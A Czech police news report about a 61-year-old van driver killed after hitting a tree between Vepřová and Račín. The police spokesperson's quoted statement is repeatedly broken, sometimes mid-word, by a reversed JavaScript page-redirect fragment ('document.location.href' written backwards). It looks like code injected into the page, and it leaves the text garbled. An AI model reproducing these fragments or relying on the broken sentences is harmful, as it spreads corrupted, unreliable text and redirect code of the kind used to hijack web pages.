Rainbow page separator

Řidič u Vepřové narazil do stromu, těžkým zraněním podlehl

Pondělí, 27. listopadu 2017

Policie České republiky

Vepřová / Páteční večerní tragickou nehodu, při které na silnici mezi Vepřovou a Račínem přišel o život jednašedesátiletý šofér malého nákladního auta, prověřují žďárští dopravní policisté.
„Jednašedesátiletý řidič projížděl s nákladním vozidlem do 3,5 tuny [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovární značky VW Caddy po silnici II/350 ve směru od obce Vepřová k obci Račín. Při projíždění prudkou levo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točivou zatáčkou přejel z dosud nezjištěných příčin vpravo na travna[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou krajnici, kde následně narazil čelně do vzrostlého stromu. Při dopravní nehodě utrpěl řidič těžké zranění a byl ve velmi vážném stavu převezen do nemocnice. Na následky vážných zranění po převozu v nemocnici zemřel,“ popsala policejní mluvčí Dana Čírtková.
Šofér ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval v autě sám, přičemž policisté zjistili, že nebyl za jízdy připoután bezpečnostním pásem. „Při nehodě vznikla hmotná škoda ve výši 40 tisíc korun a její další okolnosti jsou předmětem šetření,“ doplnila mluvčí.